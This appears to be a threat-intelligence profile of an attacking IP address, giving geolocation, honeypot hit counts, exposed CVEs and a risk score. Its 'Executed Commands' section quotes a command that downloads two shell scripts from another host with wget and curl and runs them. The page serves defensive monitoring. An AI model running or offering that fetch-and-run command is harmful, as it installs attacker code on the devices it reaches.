TROYANOSYVIRUS
Active Threat β€’ LOW

142.248.80.31

First Detection4/12/2026
Last Activity4/14/2026
ISPAdvin Services LLC
🎯
28
Total Attacks
πŸ”Œ
3
Ports
πŸ“‘
3
Attack Types
🦠
0
Malware

Geolocation

Country
πŸ‡ΊπŸ‡Έ United States
City
Unknown
ASN
AS22295
ISP
Advin Services LLC

Attack Types

adb_honeypot
web_honeypot
tcp_trap

Attacked Ports

80555517000

Associated Malware

No associated malware

Executed Commands

$cd /data/local/tmp/; busybox wget http://142.248.80.144/w.sh; sh w.sh; curl http://142.248.80.144/c.sh; sh c.sh4x
$echo hello1x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports
80
Vulnerabilities
CVE-2013-4365CVE-2024-38473CVE-2025-49812CVE-2024-36387CVE-2024-38475CVE-2025-59775CVE-2023-38709CVE-2007-4723CVE-2024-27316CVE-2012-4360CVE-2025-23048CVE-2024-38474CVE-2025-55753CVE-2024-38477CVE-2013-2765CVE-2012-3526CVE-2025-58098CVE-2024-39573CVE-2024-43394CVE-2024-40898
CPEs
cpe:/a:apache:http_server:2.4.58cpe:/o:canonical:ubuntu_linux

Risk Assessment

35
/100
LowMediumHighCritical